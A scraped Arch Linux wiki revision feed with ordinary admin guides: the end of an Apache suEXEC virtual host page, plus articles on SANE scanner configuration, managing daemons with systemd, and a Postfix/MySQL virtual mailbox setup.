ServerAlias myhost.localdomain<br />
# this is where requests for / go<br />
DocumentRoot /home/www/vhosts/myhost.localdomain/htdocs<br />
<br />
# here you tell which user (myhost) and group (ftponly) Apache should use<br />
SuexecUserGroup myhost ftponly<br />
<br />
# the following are optional but might be of use for you<br />
ScriptAlias /cgi-bin/ /home/www/vhosts/myhost.localdomain/htdocs/cgi-bin<br />
php_admin_value open_basedir /home/www/vhosts/myhost.localdomain/htdocs<br />
php_admin_value upload_tmp_dir /home/www/vhosts/myhost.localdomain/tmp<br />
# Safe mode will be removed as of PHP 6. You may want to not enable it.<br />
php_admin_flag safe_mode On<br />
ErrorDocument 404 /home/www/vhosts/myhost.localdomain<br />
<Directory "/home/www/vhosts/myhost.localdomain/htdocs"><br />
AllowOverride None<br />
Order allow,deny<br />
Allow from all<br />
Options +SymlinksIfOwnerMatch +Includes<br />
</Directory><br />
</VirtualHost><br />
</pre><br />
<br />
Note that we set upload_tmp_dir to a folder that is outside the document root of your web site (not {{ic|/home/www/vhosts/myhost.localdomain/htdocs/tmp}}). It should also be not readable or writable by any other system users. This is for security reasons: this way it cannot be modified or overwritten while PHP is processing it.<br />
<br />
== "Disabling" default DocumentRoot ==<br />
To further harden your setup you can disable the default ''DocumentRoot'' in order to not have Apache execute anything as the superuser itself runs as. This procedure does not really disable it, rather points it somewhere where it's not remotely accessible anymore. It can be easily achieved by replacing your default ''ServerName'' with the following:<br />
<br />
ServerName localhost:80<br />
<br />
== Finishing up ==<br />
Every time you change default configuration parameters you need to [[Daemons#Restarting|restart]] '''httpd''' (Apache) to make them take effect.<br />
<br />
== References ==<br />
* more in depth information about suEXEC: http://httpd.apache.org/docs/suexec.html<br />
* same about VirtualHosts: http://httpd.apache.org/docs/vhosts/index.html</div>Wakehttps://wiki.archlinux.org/index.php?title=SANE&diff=235022SANE2012-11-12T05:41:20Z<p>Wake: /* DBus problem */ systemd changes</p>
<hr />
<div>[[Category:Imaging]]<br />
[[es:Sane]]<br />
[[fr:Sane]]<br />
[[zh-CN:Sane]]<br />
{{Article summary start|Summary}}<br />
{{Article summary text|Installing and configuring Sane}}<br />
{{Article summary heading|Related}}<br />
{{Article summary wiki|Scan print and save Script}}<br />
{{Article summary end}}<br />
<br />
Sane provides a library and a command-line tool to use scanners under GNU/Linux.<br />
[http://www.sane-project.org/sane-supported-devices.html Here] you can check if sane supports your scanner.<br />
<br />
== Installation ==<br />
{{Ic|sane}} is available in the {{Ic|[extra]}} repository so:<br />
# pacman -S sane<br />
<br />
== Configuration ==<br />
Now you can try to see if sane recognizes your scanner<br />
$ scanimage -L<br />
If that fails, check that your scanner is plugged into the computer. You also might have to unplug/plug your scanner for {{ic|/etc/udev/rules.d/sane.rules}} to recognize your scanner.<br />
<br />
Now you can see if it actually works<br />
$ scanimage --format=tiff > test.tiff<br />
<br />
=== For HP hardware ===<br />
For HP hardware you may also need to install the {{Ic|hplip}} and/or {{Ic|hpoj}} packages which are in the {{Ic|extra}} repository:<br />
# pacman -S hplip hpoj<br />
<br />
* Uncomment or add {{Ic|hpaio}} and {{Ic|hpoj}} to a new line in {{ic|/etc/sane.d/dll.conf}}.<br />
* Running {{Ic|hp-setup}} as root may help you add your device.<br />
* {{Ic|hp-plugin}} is the 'HPLIP Plugin Download and Install Utility'.<br />
* {{Ic|hp-scan}} is the 'HPLIP Scan Utility'.<br />
For Hewlett-Packard OfficeJet, PSC, LaserJet, and PhotoSmart printer multi-function peripherals, run ptal-init setup as root and follow instructions:<br />
ptal-init setup<br />
Then add ptal-init to the daemons line of /etc/rc.conf or run {{ic|ptal-init start}}, as root, to enable the daemon after reboot.<br />
<br />
=== For Brother hardware ===<br />
In order to install a Brother Scanner or Printer/Scanner Combo you need the right driver (which can be found in the AUR).<br />
There are only four drivers to choose from (brscan1-4). In order to find the right one you should search for your model at the [http://welcome.solutions.brother.com/bsc/public_s/id/linux/en/download_scn.html brother linux scanner page].<br />
<br />
After you installed the driver you need to run<br />
# /usr/local/Brother/sane/setupSaneScan1 -i<br />
<br />
so the drivers/scanner are recognized by sane.<br />
<br />
For network scanners, Brother provides a configuration tool:<br />
$ brsaneconfig2 -a name=<ScannerName> model=<ScannerModel> ip=<ScannerIP><br />
Example:<br />
$ brsaneconfig2 -a name=SCANNER_DCP770CW model=DCP-770CW ip=192.168.0.110<br />
<br />
=== For Epson hardware ===<br />
For Wi-Fi and/or network scanners, you can use "Image Scan! for Linux".<br />
<br />
Install {{AUR|iscan}} and {{AUR|iscan-plugin-network}} from the [[AUR]], then update {{ic|/etc/sane.d/epkowa.conf}} and add the line:<br />
net {IP_OF_SCANNER}<br />
<br />
=== For Samsung hardware ===<br />
For some Samsung MFP printers you may need to edit /etc/sane.d/xerox_mfp.conf.<br />
<br />
example entry:<br />
#Samsung SCX-3200<br />
usb 0x04e8 0x3441<br />
<br />
Change the printer model as needed. You can get the ipVendor and idProduct code with lsusb. See [https://bbs.archlinux.org/viewtopic.php?id=123934 this thread].<br />
<br />
=== For plustek scanners ===<br />
Some plustek scanners (noticeably Canoscan ones), require a lock directory. Make sure that /var/lock/sane directory exists, that its permissions are 660, and that it is owned by <user>:scanner. If the directory permissions are wrong, only root will be able to use the scanner. Seems (at least on x86-64) that some programs using libusb (noticeably xsane and kooka) need scanner group rw permissions also for accessing /proc/bus/usb to work for a normal user.<br />
<br />
==Firmware==<br />
{{Note|This section is only needed if you need to upload firmware to your scanner.}}<br />
<br />
Firmwares usually have the '''{{Ic|.bin}}''' extension. <br />
<br />
Firstly you need to put the firmware someplace safe, it is recommended to put it in a subdirectory of {{ic|/usr/share/sane}}.<br />
<br />
Then you need to tell sane where the firmware is:<br />
*Find the name of the backend for your scanner from the [http://www.sane-project.org/sane-supported-devices.html sane supported devices list].<br />
*Open the file {{ic|/etc/sane.d/<backend-name>.conf}}.<br />
*Make sure the firmware entry is uncommented and let the file-path point to where you put the firmware file for your scanner. Be sure that members of the group {{Ic|scanner}} can access the {{ic|/etc/sane.d/<backend-name>.conf}} file.<br />
<br />
If the backend of your scanner is not part of the sane package (such as hpaio.conf which is part of hplip), you need to uncomment the relevant entry in /etc/sane.d/dll.d/hplip.<br />
<br />
==Install a frontend==<br />
XSane provides a GTK-based frontend to Sane. It is available in the {{Ic|extra}} repository.<br />
# pacman -S xsane<br />
{{Note|Scanning directly to pdf using Xsane in 16bit color depth mode is known to produces [https://bugs.launchpad.net/ubuntu/+source/xsane/+bug/539162 corrupted files]. 8bit mode should work.}}<br />
<br />
Other frontends exist, to find them you can:<br />
*use {{Ic|pacman -Ss}} to search for keywords such as "sane" or "scanner"<br />
*see the [http://www.sane-project.org/sane-frontends.html list of frontends] on the sane-project website<br />
<br />
==Network scanning==<br />
==== Sharing Your Scanner Over a Network ====<br />
<br />
You can share your scanner with other hosts on your network who use sane, xsane or xsane-enabled Gimp. To set up the server, first indicate which hosts on your network are allowed access.<br />
<br />
Change the /etc/sane.d/saned.conf file to your liking, for example:<br />
# required<br />
localhost<br />
# allow local subnet<br />
192.168.0.0/24<br />
<br />
Ensure xinetd is installed:<br />
# pacman -S xinetd<br />
<br />
Next, make sure the a file called /etc/xinetd.d/sane exists and disabled is set to no:<br />
service sane-port<br />
{<br />
port = 6566<br />
socket_type = stream<br />
wait = no<br />
user = root<br />
group = scanner<br />
server = /usr/sbin/saned<br />
disable = no<br />
}<br />
<br />
Add the following line to /etc/services:<br />
sane-port 6566/tcp<br />
<br />
[[Daemons#Starting_manually|Start]] xinetd.<br />
<br />
Your scanner can now be used by other workstations, across your local area network.<br />
<br />
To start xinetd at boot time, see [[Daemons#Starting_on_boot|Daemons]].<br />
<br />
==== Accessing Your Scanner from a Remote Workstation ====<br />
You can access your network-enabled scanner from a remote Arch Linux workstation.<br />
<br />
To set up your workstation, begin by installing xsane:<br />
# pacman -S xsane<br />
<br />
Next, specify the server's host name or IP address in the /etc/sane.d/net.conf file:<br />
# static IP address<br />
192.168.0.1<br />
# or host name<br />
stratus<br />
<br />
Now test your workstation's connection, from a non-root login prompt:<br />
$ xsane<br />
<br />
or<br />
$ scanimage -L<br />
<br />
After a short while, xsane should find your remote scanner and present you with the usual windows, ready for network scanning delight!<br />
<br />
For HP All in one network printer/scanner/fax you need to configure it via:<br />
$ hp-setup <printer ip><br />
<br />
==Troubleshooting==<br />
===Invalid argument===<br />
If you get an "Invalid argument" error with xsane or another sane front-end, this could be caused by one of the following reasons:<br />
<br />
==== Missing firmware file ====<br />
No firmware file was provided for the used scanner (see above for details).<br />
<br />
==== Wrong firmware file permissions ====<br />
The permissions for the used firmware file are wrong. Correct them using<br />
# chown root:scanner /usr/share/sane/SCANNER_MODEL/FIRMWARE_FILE<br />
# chmod ug+r /usr/share/sane/SCANNER_MODEL/FIRMWARE_FILE<br />
<br />
==== Multiple backends claim scanner ====<br />
It may happen, that multiple backends support (or pretend to support) your scanner, and sane chooses one that doesn't do after all (the scanner won't be displayed by scanimage -L then). This has happend with older Epson scanners and the <code>epson2</code> resp. <code>epson</code> backends. In this case, the solution is to comment out the unwanted backend in <code>/etc/sane.d/dll.conf</code>. In the Epson case, that would be to change<br />
<br />
epson2<br />
#epson<br />
<br />
to <br />
<br />
#epson2<br />
epson<br />
<br />
===Slow startup===<br />
If you encounter slow startup issue (e.g. xsane or scanimage -L take a lot to find scanner) it may be that more than one driver supporting it is available. <br />
<br />
Have a look at /etc/sane.d/dll.conf and try commenting out one (e.g. you may have epson, epson2 and epkowa enabled at the same time, try leaving only epson or epkowa uncommented)<br />
<br />
===Permission problem===<br />
If you see your scanner only when doing {{Ic|sudo lsusb}} you might get it working by adding your user to {{Ic|scanner}} and/or {{Ic|lp}} group.<br />
# gpasswd -a username scanner<br />
# gpasswd -a username lp<br />
This is reported to work on HP all-in-one models (e.g., PSC 1315 and PSC 2355).<br />
<br />
'''Also you could try to change permission of usb device''' but this is not recommended, a better solution is to fix the Udev rules so that your scanner is recognized.<br />
<br />
Example:<br />
<br />
First, switch to root and check connected usb devices with command 'lsusb'<br />
<br />
#[root@archlinux ~]# lsusb <br />
#Bus 006 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />
#Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />
#Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />
#Bus 003 Device 003: ID 04d9:1603 Holtek Semiconductor, Inc. <br />
#Bus 003 Device 002: ID 04fc:0538 Sunplus Technology Co., Ltd <br />
#Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />
#Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />
#Bus 001 Device 006: ID 03f0:2504 Hewlett-Packard <br />
#Bus 001 Device 002: ID 046d:0802 Logitech, Inc. Webcam C200<br />
#Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub<br />
#[root@archlinux ~]# <br />
<br />
In our example we see scanner - ''''Bus 001 Device 006: ID 03f0:2504 Hewlett-Packard''''<br />
<br />
Now edit the file vi /lib/udev/rules.d/53-sane.rules and look for the first part of the ID number found previously and check if there is a line that also reports the second part of the number (model numer), in this example 2504. If not found change or copy a line and enter the idVendor and idProduct of your scanner, in this example it would be:<br />
<br />
# Hewlett-Packard ScanJet 4100C<br />
ATTRS{idVendor}=="03f0", ATTRS{idProduct}=="2504", MODE="0664", GROUP="scanner",<br />
ENV{libsane_matched}="yes"<br />
<br />
Save the file, plug out and back in your scanner and the file permissions should be now correct.<br />
<br />
Another tip, is that you can add your device (scanner) in backend file:<br />
<br />
In example we add string ''''usb 0x03f0 0x2504'''' to file ''''/etc/sane.d/hp4200.conf''''<br />
<br />
Now file looks like this:<br />
<br />
$ cat /etc/sane.d/hp4200.conf<br />
#<br />
# Configuration file for the hp4200 backend<br />
#<br />
#<br />
# HP4200<br />
#usb 0x03f0 0x0105<br />
usb 0x03f0 0x2504<br />
<br />
===DBus problem===<br />
If you get following problem:<br />
arguments to dbus_connection_send() were incorrect, assertion "connection != NULL" failed in file dbus-connection.c<br />
<br />
Make sure the {{Ic|dbus}} user is in the groups {{Ic|lp}} and {{Ic|scanner}}:<br />
$ groups dbus<br />
dbus<br />
# gpasswd -a dbus lp<br />
# gpasswd -a dbus scanner<br />
<br />
(Note that dbus must be stopped and started for the group changes take effect.)<br />
<br />
Confirm dbus is running. See [[Daemons#Status_reporting]].<br />
<br />
If it isn't, [[Daemons#Starting_manually|start it]]. You might want to [[Daemons#Starting_on_boot|start it at boot time]].<br />
<br />
A session dbus alone seems to be insufficient for scanner operation.<br />
<br />
===Epson Perfection 1270===<br />
<br />
For Epson Perfection 1270, you also need a firmware named esfw3e.bin, you can get it from (anyone could give a working place so I can upload it?), or you can get it yourself by reference to [http://wiki.archlinux.org/index.php/Scanner_setup_%26_configure Scanner setup & configure]. I get it by installing the driver in the windows.<br />
<br />
Modify configuration file of snapscan backend:<br />
<br />
vi /etc/sane.d/snapscan.conf <br />
<br />
Change the firmware path line with yours. :<br />
<br />
<pre><br />
# Change to the fully qualified filename of your firmware file, if<br />
# firmware upload is needed by the scanner<br />
firmware /mnt/mydata/Backups/firmware/esfw3e.bin<br />
</pre><br />
<br />
And add the following line in the end or anywhere you like<br />
<br />
<pre><br />
# Epson Perfection 1270<br />
usb 0x04b8 0x0120<br />
</pre><br />
<br />
You can get such code information (''usb 0x04b8 0x0120'') by "sane-find-scanner" command.<br />
<br />
Also add such information lines in your libsane.usermap file to setup your privilage, like:<br />
<br />
vi /etc/hotplug/usb/libsane.usermap<br />
<br />
#Epson Perfection 1270<br />
libusbscanner 0x0003 0x04b8 0x0120 0x0000 0x0000 0x00 0x00 0x00 0x00 0x00 0x00 0x00000000<br />
<br />
Replug scanner, you have a working Epson Perfection 1270 now.<br />
<br />
NOTE: I can scan image if I define the X and Y value, but without that error meassage occors like: "scanimage: sane_start: Error during device I/O", if anyone know why, please complete the section.<br />
".</div>Wakehttps://wiki.archlinux.org/index.php?title=Daemons&diff=235021Daemons2012-11-12T05:37:27Z<p>Wake: Add status reporting.</p>
<hr />
<div>[[Category:Boot process]]<br />
[[Category:Daemons and system services]]<br />
[[cs:Daemon]]<br />
[[de:Daemons]]<br />
[[it:Daemon]]<br />
[[pl:Daemon]]<br />
[[ro:Daemon]]<br />
[[ru:Daemon]]<br />
[[tr:Artsüreç]]<br />
[[zh-CN:Daemon]]<br />
A [[Wikipedia:Daemon (computing)|daemon]] is a program that runs in the background, waiting for events to occur and offering services. A good example is a web server that waits for a request to deliver a page or a ssh server waiting for someone trying to log in. While these are full featured applications, there are daemons whose work is not that visible. Daemons are for tasks like writing messages into a log file (e.g. {{ic|syslog}}, {{ic|metalog}}) or keeping your system time accurate (e.g. [[Network Time Protocol daemon|{{ic|ntpd}}]]). For more information see {{ic|man 7 daemon}}.<br />
<br />
{{Note|The word daemon is sometimes used for a class of programs that are started at boot but have no process which remains in memory. They are called daemons simply because they utilize the same startup/shutdown framework (e.g. systemd service files of Type oneshot) used to start traditional daemons. For example, the service files for {{ic|alsa-store}} and {{ic|alsa-restore}} provide persistent configuration support but do not start additional background processes to service requests or respond to events.<br />
<br />
From the user's perspective the distinction is typically not significant unless the user tries to look for the "daemon" in a process list.<br />
}}<br />
<br />
==Managing daemons==<br />
In Arch Linux, daemons are handled by [[systemd]]. The ''systemctl'' command is used to control them.<br />
<br />
===Starting on boot===<br />
A default install of Arch Linux will leave you with very few services (or daemons) enabled during boot. You can add or remove services to be started on boot by calling<br />
<br />
# systemctl enable <name><br />
<br />
or<br />
<br />
# systemctl disable <name><br />
<br />
The services themselves contain the necessary ordering information, so there is no need to order them manually.<br />
<br />
Service files are stored in {{ic|/{etc,usr/lib,run}/systemd/system}}. You can print the list of all the available services on your system, along with their current status, with:<br />
$ systemctl list-unit-files<br />
<br />
To see a list of running units (some of which will be daemons, among other things), type:<br />
$ systemctl list-units<br />
<br />
To see all available ones, add {{ic| --all}} to the end of a command.<br />
<br />
===Starting manually===<br />
To start or stop services at runtime, use {{ic|systemctl start<nowiki>|</nowiki>stop ''<service>''}}.<br />
<br />
===Restarting===<br />
To restart services, use {{ic|systemctl restart ''<service>''}}.<br />
<br />
===Status reporting===<br />
To report the current status of a service, use {{ic|systemctl status ''<service>''}}.<br />
<br />
==List of daemons==<br />
See [[Daemons List]] for a list of daemons with the name of the service and legacy rc.d script.<br />
<br />
==See also==<br />
* [[Systemd|systemd]]<br />
* Examples for writing [[Systemd/Services]]</div>Wakehttps://wiki.archlinux.org/index.php?title=Postfix&diff=235020Postfix2012-11-12T05:28:16Z<p>Wake: /* Step 1: Test postfix */ Use bc/ic templates.</p>
<hr />
<div>[[Category:Mail Server]]<br />
From [http://www.postfix.org/ Postfix's site]:<br />
:"''Postfix attempts to be fast, easy to administer, and secure, while at the same time being sendmail compatible enough to not upset existing users. Thus, the outside has a sendmail-ish flavor, but the inside is completely different.''"<br />
<br />
The goal of this article is to setup postfix for virtual mailbox delivery only. There will be no delivery to user accounts on the system ({{ic|/etc/passwd}}). Further, access will only be available via a web mail frontend (squirrelmail), no direct pop3 or imap access will be granted. It should be fairly easy to allow those additional features given the information below, but it is not within the scope of this document.<br />
<br />
For a local mail delivery guide, see: [[Local Mail Delivery with Postfix]].<br />
<br />
==Required packages==<br />
*postfix (compiled for mysql support)<br />
*courier-imap<br />
*squirrelmail<br />
*mysql<br />
*apache<br />
*ssl<br />
<br />
If you have trouble finding a package specific to this How-To, try the resources link at the bottom.<br />
<br />
==Postfix Installation==<br />
===Step 1: Install Postfix===<br />
Postfix with MySQL enabled is required for this HOW-TO.<br />
So we will [[pacman|install]] the package called {{Pkg|postfix}} which can be found in the [[Official Repositories|official repositories]].<br />
<br />
===Step 2: Check /etc/passwd, /etc/group===<br />
Make sure that the following shows up in {{ic|/etc/passwd}}:<br />
postfix:x:73:73::/var/spool/postfix:/bin/false<br />
<br />
Make sure that the following shows up in {{ic|/etc/group}}:<br />
postdrop:x:75:<br />
postfix:x:73:<br />
<br />
{{Note|Postfix can be made to run in a chroot. This document does not currently cover this and might be added later.}}<br />
<br />
==Postfix Configuration==<br />
===Step 1: Setup MX record ===<br />
<br />
An MX record should point to the mail host. Usually this is done from configuration interface of your domain provider.<br />
<br />
A mail exchanger record (MX record) is a type of resource record in the Domain Name System that specifies a mail server responsible for accepting email messages on behalf of a recipient's domain. <br />
<br />
When an e-mail message is sent through the Internet, the sending mail transfer agent queries the Domain Name System for MX records of each recipient's domain name. This query returns a list of host names of mail exchange servers accepting incoming mail for that domain and their preferences. The sending agent then attempts to establish an SMTP connection to one of these servers, starting with the one with the smallest preference number, delivering the message to the first server with which a connection can be made. <br />
<br />
{{Note|Some mail servers will not deliver mail to you if your MX record points to a CNAME. For best results, always point an MX record to an A record definition. For more information, see e.g. [https://secure.wikimedia.org/wikipedia/en/wiki/List_of_DNS_record_types Wikipedia's List of DNS Record Types].}}<br />
<br />
===Step 2: /etc/postfix/master.cf===<br />
This is the Pipeline configuration file, in which you can put your new pipes e.g. to check for Spam!<br />
<br />
===Step 3: /etc/postfix/main.cf===<br />
====Step 3.1 myhostname====<br />
set myhostname if your mail server has multiple domains, and you do not want the primary domain to be the mail host. The default is to use the result of a gethostname() call if nothing is specified.<br />
For our purposes we will just set it as follows:<br />
<pre><br />
myhostname = mail.nospam.net<br />
</pre><br />
This is assuming that a DNS A record, and an MX record both point to mail.nospam.net<br />
<br />
====Step 3.2 mydomain====<br />
this is usually the value of myhostname, minus the first part. If your domain is wonky, then just set it manually.<br />
<pre><br />
mydomain = nospam.net<br />
</pre><br />
<br />
====Step 3.3 myorigin====<br />
this is where the email will be seen as being sent from. I usually set this to the value of mydomain. For simple servers, this works fine. This is for mail originating from a local account. Since we are not doing local delivery (except sending), then this is not really as important as it normally would be.<br />
<pre><br />
myorigin = $mydomain<br />
</pre><br />
<br />
====Step 3.4 mydestination====<br />
This is the lookup for local users. Since we are not going to deliver internet mail for any local users, set this to localhost only.<br />
<pre><br />
mydestination = localhost<br />
</pre><br />
<br />
====Step 3.5 mynetworks and mynetwork_style====<br />
Both of these control relaying, and whom is allowed to. We do not want any relaying.<br />
For our sakes, we will simply set mynetwork_style to host, as we are trying to make a standalone postfix host, that people with use webmail on. No relaying, no other MTA's. Just webmail.<br />
<pre><br />
mynetworks_style = host<br />
</pre><br />
<br />
====Step 3.6 relaydomains====<br />
This controls the destinations that postfix will relay TO. The default value is $mydestination. This should be fine for now.<br />
<pre><br />
relay_domains = $mydestination<br />
</pre><br />
<br />
====Step 3.7 home_mailbox====<br />
This setting controls how mail is stored for the users.<br />
Set this to "Maildir/", as courier IMAP requires Maildir style mail storage. This is a good thing. Maildir format mailboxes remove the possible race conditions that can occur with old style mbox formats. No more need to deal with file locking. The '/' at the end is REQUIRED.<br />
<pre><br />
home_mailbox = Maildir/<br />
</pre><br />
<br />
====Step 3.8 virtual_mail====<br />
Virtual mail is mail that does not map to a user account (/etc/passwd). This is where all the email for the system will be kept. We are not doing local delivery, remember, so if you want a user that has the same name as a local user, just make a virtual account with the same name.<br />
First thing we need to do is add the following:<br />
<pre><br />
virtual_mailbox_domains = virtualdomain.tld<br />
virtual_alias_maps = hash:/etc/postfix/virtual_alias, mysql:/etc/postfix/mysql_virtual_forwards.cf<br />
virtual_mailbox_domains = mysql:/etc/postfix/mysql_virtual_domains.cf<br />
virtual_mailbox_maps = mysql:/etc/postfix/mysql_virtual_mailboxes.cf<br />
virtual_mailbox_base = /home/vmailer<br />
virtual_uid_maps = static:5003<br />
virtual_gid_maps = static:5003<br />
virtual_minimum_uid = 5003<br />
virtual_mailbox_limit = 51200000<br />
</pre><br />
<br />
virtual_mailbox_domains is a list of the domains that you want to receive mail for. This CANNOT be the same thing that is listed in mydestination. That is why we left mydestination to be localhost only.<br />
virtual_mailbox_maps will contain the info about the virtual users and their mailbox locations. We are using a hash file to store the more permanent maps, and these will override the forwards in the mysql database.<br />
<br />
virtual_mailbox_base is the base dir where the virtual mailboxes will be stored.<br />
The gid and uid maps are the real system user account that the virtual mail will be owned by. This is for storage purposes. Since we will be using a web interface, and do not want people accessing this by any other means, we will be creating this account later with no login access.<br />
Virtual_mailbox_limit controls the size of the mailbox. I do not know how well this works yet. I have set the size above to about 50MB.<br />
====Step 3.9 Default message &amp; mailbox size limits====<br />
Postfix imposes both message and mailbox size limits by default. The message_size_limit controls the maximum size in bytes of a message, including envelope information. (default 10240000) The mailbox_size_limit controls the maximum size of any local individual mailbox or maildir file. This limits the size of '''any''' file that is written to upon local delivery, '''including files written by external commands''' (i.e. procmail) that are executed by the local delivery agent. (default is 51200000, set to 0 for no limit) If bounced message notifications are generated, check the size of the local mailbox under /var/spool/mail and use postconf to check these size limits:<br />
<br />
<pre><br />
supersff:~> postconf -d mailbox_size_limit<br />
mailbox_size_limit = 51200000<br />
supersff:~> postconf -d message_size_limit<br />
message_size_limit = 10240000<br />
</pre><br />
<br />
===Step 4. /etc/postfix/aliases===<br />
We need to map some aliases to real accounts. The default setup by arch looks pretty good here. =D<br />
Uncomment the following line, and change it to a real account. I put the user account on the box that I use. Best not to just send mail to root, because you do not want to be logging in as root or checking email as root. Not good. Sudo is your friend, and so is forwarding root mail. Since this is for local delivery only (syslogs and stuff), it is still within the realm of mydestination.<br />
<pre><br />
root: cactus<br />
</pre><br />
Once you have finished editing /etc/postfix/aliases you must run the postalias command.<br />
<pre><br />
postalias /etc/postfix/aliases<br />
</pre><br />
<br />
===Step 5. /etc/postfix/virtual_alias===<br />
Create /etc/postfix/virtual_alias with the following contents<br />
<pre><br />
MAILER-DAEMON: postmaster<br />
postmaster: root<br />
<br />
# General redirections for pseudo accounts<br />
bin: root<br />
daemon: root<br />
named: root<br />
nobody: root<br />
uucp: root<br />
www: root<br />
ftp-bugs: root<br />
postfix: root<br />
<br />
# Put your local aliases here.<br />
<br />
# Well-known aliases<br />
manager: root<br />
dumper: root<br />
operator: root<br />
abuse: postmaster<br />
<br />
# trap decode to catch security attacks<br />
decode: root<br />
<br />
# Person who should get root's mail. Don't receive mail as root!<br />
root: cactus@virtualdomain.tld<br />
</pre><br />
<br />
Then run the postalias command on it.<br />
<pre><br />
postalias /etc/postfix/virtual_alias<br />
</pre><br />
<br />
===Step 6. mysql_virtual_domains.cf===<br />
Create the /etc/postfix/mysql_virtual_domains.cf file with the following (or similar) contents:<br />
<pre><br />
user = postfixuser<br />
password = XXXXXXXXXX<br />
hosts = localhost<br />
dbname = postfix<br />
table = domains<br />
select_field = 'virtual'<br />
where_field = domain<br />
</pre><br />
<br />
===Step 7. mysql_virtual_mailboxes.cf===<br />
Create the /etc/postfix/mysql_virtual_mailboxes.cf file with the following (or similar) contents:<br />
<pre><br />
user = postfixuser<br />
password = XXXXXXXXXX<br />
hosts = localhost<br />
dbname = postfix<br />
table = users<br />
select_field = concat(domain,'/',email,'/')<br />
where_field = email<br />
</pre><br />
<br />
===Step 8. mysql_virtual_forwards.cf===<br />
Create the /etc/postfix/mysql_virtual_forwards.cf file with the following (or similar) contents:<br />
<pre><br />
user = postfixuser<br />
password = XXXXXXXXXX<br />
hosts = localhost<br />
dbname = postfix<br />
table = forwardings<br />
select_field = destination<br />
where_field = source<br />
</pre><br />
<br />
===Step 9. postfix check===<br />
Run the postfix check command. It should output anything that you might have done wrong in a config file. To see all of your configs, type <kbd>postconf</kbd>. To see how you differ from the defaults, try <kbd>postconf -n</kbd><br />
<br />
===Step 10. Enable and Start the Daemon===<br />
Enabling the service will automatically start postfix at boot, but needs to be started manually for the first time.<br />
<br />
# systemctl enable postfix.service<br />
# systemctl start postfix.service<br />
<br />
===Step 11. newuser===<br />
We need to create the user for storing the virtual mail. Create a vmailuser as follows:<br />
<pre><br />
groupadd -g 5003 vmail<br />
useradd -g vmail -u 5003 -d /home/vmailer -s /bin/false vmailer<br />
mkdir /home/vmailer<br />
chown vmailer.vmail /home/vmailer<br />
chmod -R 750 /home/vmailer<br />
passwd vmailer<br />
</pre><br />
note that 5003 is the gid specified in the postfix main.cf file.<br />
note that 5003 is the uid specified in the postfix main.cf file.<br />
<br />
==Mysql configuration==<br />
===Step 1. Create a mysql Database===<br />
Create mysql database called 'postfix', or something similar.<br />
<br />
CREATE DATABASE postfix;<br />
USE postfix;<br />
<br />
===Step 2. Setup table structure.===<br />
Import the following table structure.<br />
<pre><br />
CREATE TABLE `domains` (<br />
`domain` varchar(50) NOT NULL default '',<br />
PRIMARY KEY (`domain`),<br />
UNIQUE KEY `domain` (`domain`)<br />
);<br />
<br />
<br />
CREATE TABLE `forwardings` (<br />
`source` varchar(80) NOT NULL default '',<br />
`destination` text NOT NULL,<br />
PRIMARY KEY (`source`)<br />
);<br />
<br />
CREATE TABLE `users` (<br />
`email` varchar(80) NOT NULL default '',<br />
`password` varchar(20) NOT NULL default '',<br />
`quota` varchar(20) NOT NULL default '20971520',<br />
`domain` varchar(255) NOT NULL default '',<br />
UNIQUE KEY `email` (`email`)<br />
);<br />
</pre><br />
<br />
===Step 3. Create a mysql user===<br />
Add a user for postfix to use. Something like \"postfixuser\".<br />
Give permissions for postfix user to the table. This user should be listed in the /etc/postfix/mysql''virtual''domains.cf file.<br />
<br />
The [http://dev.mysql.com/doc/refman/5.5/en/server-administration.html official reference manual] has a detailed guide on user management and server administration in general.<br />
<br />
The following is just an example for creation of 'postfixuser' with password 'XXXXXXXXXX'.<br />
Note that the GRANT statements need to be executed after creating the tables in the next step.<br />
<br />
CREATE USER 'postfixuser' IDENTIFIED BY 'XXXXXXXXXX';<br />
GRANT SELECT, INSERT, UPDATE, DELETE ON domains TO postfixuser;<br />
GRANT SELECT, INSERT, UPDATE, DELETE ON forwardings TO postfixuser;<br />
GRANT SELECT, INSERT, UPDATE, DELETE ON users TO postfixuser;<br />
<br />
===Step 4. Add a domain.===<br />
<pre><br />
INSERT INTO `domains` VALUES ('virtualdomain.tld');<br />
</pre><br />
<br />
===Step 5. Add a user.===<br />
<pre><br />
INSERT INTO `users` VALUES ('cactus@virtualdomain.tld', 'secret', <br />
'20971520', 'virtualdomain.tld');<br />
</pre><br />
<br />
The above creates the user and sets a password as secret. <br />
<br />
This will allow you to use encrypted passwords<br />
<br />
<pre><br />
INSERT INTO `users` VALUES ('cactus@virtualdomain.tld', ENCRYPT('secret'), <br />
'20971520', 'virtualdomain.tld');<br />
</pre><br />
<br />
==Test Postfix==<br />
===Step 1: Start postfix===<br />
See [[Daemons#Starting_manually]]<br />
<br />
===Step 2: Test postfix===<br />
Lets see if postfix is going to deliver mail for our test user.<br />
{{bc|<br />
telnet servername 25<br />
ehlo testmail.org<br />
mail from:<test@testmail.org><br />
rcpt to:<cactus@virtualdomain.tld><br />
data<br />
This is a test email.<br />
<br />
.<br />
quit<br />
}}<br />
==== Error response ====<br />
451 4.3.0 <lisi@test.com>:Temporary lookup failure<br />
maybe you have entered the wrong user/pass for mysql or the mysql socket is not in the right place.<br />
<br />
<br />
==== See that you have received a email ====<br />
now type {{ic|find /home/vmailer}}<br />
<br />
you should see something like the following:<br />
{{bc|<br />
/home/vmailer/virtualdomain.tld/cactus@virtualdomain.tld<br />
/home/vmailer/virtualdomain.tld/cactus@virtualdomain.tld/tmp<br />
/home/vmailer/virtualdomain.tld/cactus@virtualdomain.tld/cur<br />
/home/vmailer/virtualdomain.tld/cactus@virtualdomain.tld/new<br />
/home/vmailer/virtualdomain.tld/cactus@virtualdomain.tld/new/1102974226.2704_0.bonk.testmail.org<br />
}}<br />
The key is the last entry. This is an actual email. If you see that, it is working.<br />
<br />
==Courier IMAP Installation==<br />
===Step 1: Install Courier IMAP===<br />
{{Accuracy|The courier packages are currently dropped from the offical repositories and moved to the [[AUR]]}}<br />
<pre><br />
pacman -S courier-imap<br />
</pre><br />
<br />
